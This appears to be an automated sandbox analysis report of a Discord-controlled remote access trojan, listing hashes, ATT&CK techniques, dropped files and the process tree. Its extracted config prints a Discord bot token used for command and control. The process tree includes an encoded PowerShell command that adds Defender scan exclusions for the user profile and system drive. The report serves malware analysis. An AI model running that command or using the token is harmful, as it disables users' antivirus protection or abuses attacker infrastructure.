discordrat | 260ad25ba866a0c2c53fb170fa87debbf9041a87b70a0c632786adf379c2db3a

General

Target

hgvj.exe
Size

593KB
MD5

cd7ea040328d5a26e9db4e3fe252b840
SHA1

9be79e3a740718d1b7f92c9e5a1ce0b782e47386
SHA256

260ad25ba866a0c2c53fb170fa87debbf9041a87b70a0c632786adf379c2db3a
SHA512

4e6372353c81180631ffd2378a53b2dc53408dd1e831b020eced199b1a8b5aeb53631e4e0fc1784c7e7848fd036b056ae16a78ee77dc3479c0960b576c82b86e
SSDEEP

12288:54MQmjJfELB92d9b0G8vdqk20H/ORA0y5ZU9E5bjJo9l:54MNJCM74vHGRY5+9OnJ

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIxMDY4MTk1NTQyNzk1MDY4Mg.Gy5dHF.usUl_OuFhHY1gNEyIwlH2QhBUK8j2WHU94qm9Q
server_id
1210681778017144962

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\DQkjXhfikBAXkS\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\DQkjXhfikBAXkS"	FJUIB.exe

Executes dropped EXE 3 IoCs

pid	Process
2652	injector.exe
2552	Client-built.exe
2948	FJUIB.exe

Loads dropped DLL 9 IoCs

pid	Process
1752	hgvj.exe
1752	hgvj.exe
2580	Process not Found
776	WerFault.exe
776	WerFault.exe
776	WerFault.exe
776	WerFault.exe
776	WerFault.exe
2652	injector.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\Download\FJUIB.exe	injector.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2612	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2948	FJUIB.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeLoadDriverPrivilege	2948	FJUIB.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 2612	1752	hgvj.exe	28
PID 1752 wrote to memory of 2612	1752	hgvj.exe	28
PID 1752 wrote to memory of 2612	1752	hgvj.exe	28
PID 1752 wrote to memory of 2652	1752	hgvj.exe	30
PID 1752 wrote to memory of 2652	1752	hgvj.exe	30
PID 1752 wrote to memory of 2652	1752	hgvj.exe	30
PID 1752 wrote to memory of 2552	1752	hgvj.exe	32
PID 1752 wrote to memory of 2552	1752	hgvj.exe	32
PID 1752 wrote to memory of 2552	1752	hgvj.exe	32
PID 2552 wrote to memory of 776	2552	Client-built.exe	33
PID 2552 wrote to memory of 776	2552	Client-built.exe	33
PID 2552 wrote to memory of 776	2552	Client-built.exe	33
PID 2652 wrote to memory of 2456	2652	injector.exe	35
PID 2652 wrote to memory of 2456	2652	injector.exe	35
PID 2652 wrote to memory of 2456	2652	injector.exe	35
PID 2652 wrote to memory of 2492	2652	injector.exe	34
PID 2652 wrote to memory of 2492	2652	injector.exe	34
PID 2652 wrote to memory of 2492	2652	injector.exe	34
PID 2652 wrote to memory of 2948	2652	injector.exe	37
PID 2652 wrote to memory of 2948	2652	injector.exe	37
PID 2652 wrote to memory of 2948	2652	injector.exe	37

C:\Users\Admin\AppData\Local\Temp\hgvj.exe
"C:\Users\Admin\AppData\Local\Temp\hgvj.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAcwBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAaAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeABrACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Users\Admin\AppData\Local\Temp\injector.exe
  "C:\Users\Admin\AppData\Local\Temp\injector.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 9
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2456
- - C:\Windows\SoftwareDistribution\Download\FJUIB.exe
    "C:\Windows\SoftwareDistribution\Download\FJUIB.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2552 -s 596
    3⤵
    - Loads dropped DLL
    PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
78KB

MD5
a9b0036b5a427a71f462b9983ec3ed08

SHA1
3c7e7edc8f67e0d75c2ed9103e4b9aa00e9f6bdb

SHA256
bc8e1459074ad73a45d919a4be28396d3c12bb22bc0c05dc82cb502fa888e01d

SHA512
bc94330727e48a114f6d9caa1d21973a3840360beed5a61a8da648a30c562b3c9479fc05ce68fdcb0f0799234e4f74e008efc1cac591970cbc37e95541d70f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\injector.exe

Filesize
384KB

MD5
ce1a4e327f1db579b1ba5d56ec8d98c7

SHA1
421fcd2556dd07e8adcee3471026a8b1c4de3f93

SHA256
38d4d52f8d33f7b77496da6f256f6a122481dc8c2a19640af8815b0b6926b5a0

SHA512
39cb8e2ae2b116bc2ff025ab27ea7a90d5fc43d79fc49ba68c6907cb42748608d414b632d56aab7703cecbfdd5ab4b84086b80e57f7d69e6b8b3cce208a2461a

Download Submit
\Users\Admin\AppData\Local\Temp\injector.exe

Filesize
507KB

MD5
15fa4864c56c1bc724f1098aba8f08fb

SHA1
faad863bfde036ac3ea9c65090fcdf8716d8147c

SHA256
3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993

SHA512
75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465

Download Submit
\Windows\SoftwareDistribution\Download\FJUIB.exe

Filesize
100KB

MD5
9886a738e05f8a8fe04e9d0c81cc0909

SHA1
f659c6a123eb11f6f34f618265dbd54a9aa7f5e3

SHA256
abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6

SHA512
0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21

Download Submit
memory/1752-0-0x0000000000970000-0x0000000000A0A000-memory.dmp

Filesize
616KB

Download
memory/1752-1-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

Filesize
9.9MB

Download
memory/1752-2-0x0000000001FE0000-0x0000000002060000-memory.dmp

Filesize
512KB

Download
memory/1752-19-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

Filesize
9.9MB

Download
memory/2552-18-0x000000013F620000-0x000000013F638000-memory.dmp

Filesize
96KB

Download
memory/2552-44-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

Filesize
9.9MB

Download
memory/2552-28-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

Filesize
9.9MB

Download
memory/2552-29-0x000000001B970000-0x000000001B9F0000-memory.dmp

Filesize
512KB

Download
memory/2612-22-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/2612-26-0x0000000002BE0000-0x0000000002C60000-memory.dmp

Filesize
512KB

Download
memory/2612-27-0x0000000002BE0000-0x0000000002C60000-memory.dmp

Filesize
512KB

Download
memory/2612-25-0x000007FEF27B0000-0x000007FEF314D000-memory.dmp

Filesize
9.6MB

Download
memory/2612-24-0x0000000002BE0000-0x0000000002C60000-memory.dmp

Filesize
512KB

Download
memory/2612-30-0x000007FEF27B0000-0x000007FEF314D000-memory.dmp

Filesize
9.6MB

Download
memory/2612-23-0x000007FEF27B0000-0x000007FEF314D000-memory.dmp

Filesize
9.6MB

Download
memory/2612-21-0x000000001B820000-0x000000001BB02000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads